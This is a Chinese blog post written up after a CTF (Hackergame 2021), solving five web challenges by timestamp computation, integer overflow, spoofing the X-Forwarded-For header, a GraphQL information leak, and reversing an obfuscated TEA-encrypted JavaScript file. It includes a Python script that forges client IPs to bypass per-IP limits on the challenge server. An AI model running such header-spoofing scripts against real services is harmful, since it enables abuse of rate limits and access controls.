目录

HackGame 2021 WEB WP

头一次参加 Hackergame 题目质量高,基本不会做,下次还敢。

只有五道web题,前面四道基本直接做出来,mineCraft写了半天反函数,最后百度到了~~(痛苦面具~~

签到

https://cdn.bingbingzi.cn/blog/20211030153444.png
picture

看起来好像是要计算时间戳,执行命令date +%s得到页数,GET传参得到flag。

卖瓜

一开始以为是条件竞争,测试一番无果。烦躁之下打了一串1,发现溢出变成负数了。(啊这。。)

https://cdn.bingbingzi.cn/blog/20211030153913.png

1
2
3
4
5
6
7
8
9
9 1E19
9 1.024819115E18
9 206086200
9 1
9 1E19
9 1.024819115E18
9 206086200
9 1
9 2

FLAG 助力大红包

指名道姓了属实是抓包发现前端认证是POST请求中的ip,后端认证可以用XFF伪造。

题目限制1s一包。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import time

def r(i):
    header = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36",
        "X-Forwarded-For":str(i)+".1.1.1"
    }
    
    data = "ip="+str(i)+".1.1.1"
    
    rr = requests.post('http://202.38.93.111:10888/invite/859350df-fe78-4448-9263-b1c79f0a777b',data=data,headers=header)
    if "成功" in rr.text:
        pass
    else:
        print(i)

for i in range(10,256):
    r(i)
    time.sleep(1)

图之上的信息

题目提示GraphQL,搜索一下发现有信息泄漏漏洞,照着写:

https://cdn.bingbingzi.cn/blog/20211030160030.png
picture

按照格式替换一下子段,得到flag

https://cdn.bingbingzi.cn/blog/20211030160121.png
picture

mineCraft

骗舍友说这是网页版MC,结果被打了一顿。

发现目录下存在/misc/flag.js,对这个混淆过的js分析:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
const _0x22517d = _0x2c9e;
(function(_0x2018e5, _0xd122c5) {
    const _0x4a600d = _0x2c9e,
        _0x2e34d2 = _0x2018e5();
    while (!![]) {
        try {
            const _0x4d38c4 = -parseInt(_0x4a600d(0x1b1)) / 0x1 * (parseInt(_0x4a600d(0x1ad)) / 0x2) + -parseInt(_0x4a600d(0x1b2)) / 0x3 * (parseInt(_0x4a600d(0x1b6)) / 0x4) + -parseInt(_0x4a600d(0x1ae)) / 0x5 * (-parseInt(_0x4a600d(0x1b4)) / 0x6) + parseInt(_0x4a600d(0x1ab)) / 0x7 * (parseInt(_0x4a600d(0x1af)) / 0x8) + parseInt(_0x4a600d(0x1b5)) / 0x9 + -parseInt(_0x4a600d(0x1b3)) / 0xa + -parseInt(_0x4a600d(0x1a9)) / 0xb * (-parseInt(_0x4a600d(0x1a7)) / 0xc);
            if (_0x4d38c4 === _0xd122c5)
                break;
            else
                _0x2e34d2['push'](_0x2e34d2['shift']());
        } catch (_0x416145) {
            _0x2e34d2['push'](_0x2e34d2['shift']());
        }
    }
}(_0x381b, 0x21c08),
String['prototype']["encrypt"] = function(_0x6a2659) {
    _0x6a2659 = "1356853149054377"
    const array1 = new Array(2),
        array2 = new Array(4);
    let encrypted_text = '';
    plaintext = escape(this);
    // console.log("plaintext = " + plaintext)
    for (var i = 0; i < 4; i++)
        array2[i] = Str4ToLong(_0x6a2659["slice"](i * 4, (i + 1) * 4));
        // array2 = [909456177, 825439544, 892352820, 926364468]

    // console.log(array2)
    for (i = 0; i < plaintext["length"]; i += 8) {
        array1[0] = Str4ToLong(plaintext['slice'](i, i + 4)),
        array1[1] = Str4ToLong(plaintext["slice"](i + 4, i + 8)),
        // console.log("1")
        // console.log(array1)
        // console.log(code(array1, array2));
        code(array1, [909456177, 825439544, 892352820, 926364468]),
        // console.log("2")
        // console.log(array1[0])
        // console.log(LongToBase16(array1[0]))
        // console.log(LongToBase16(array1[0]) + LongToBase16(array1[1]))
        // ==========================   flag    =============================
        // =                array1[0]        array1[1]                      =           
        // =                1874716276       -2120590913                    =
        // =                -1591700906      1531749031                     =               
        // =                -1591884176      -965187555                     =               
        // =                -1354040473      79179532                       =
        // ==========================   flag    =============================
        encrypted_text += LongToBase16(array1[0]) + LongToBase16(array1[1]);
    }
    return encrypted_text;
});
function decode(array1,array2) {
    // console.log("raw")
    // console.log(array1)
    let return_a = array1[0],
        return_b = array1[1];
    let i = 84941944608;
    // console.log(return_a)
    while (i != 0) {
        return_b -= (return_a << 4 ^ return_a >>> 5) + return_a ^ i + array2[i >>> 11 & 3],
        i -= 2654435769,
        return_a -= (return_b << 4 ^ return_b >>> 5) + return_b ^ i + array2[i & 3];
    }
    array1[0] = return_a,
    array1[1] = return_b;
    console.log(array1)
}

写反函数写了快一天,然后百度tea发现有现成的。。。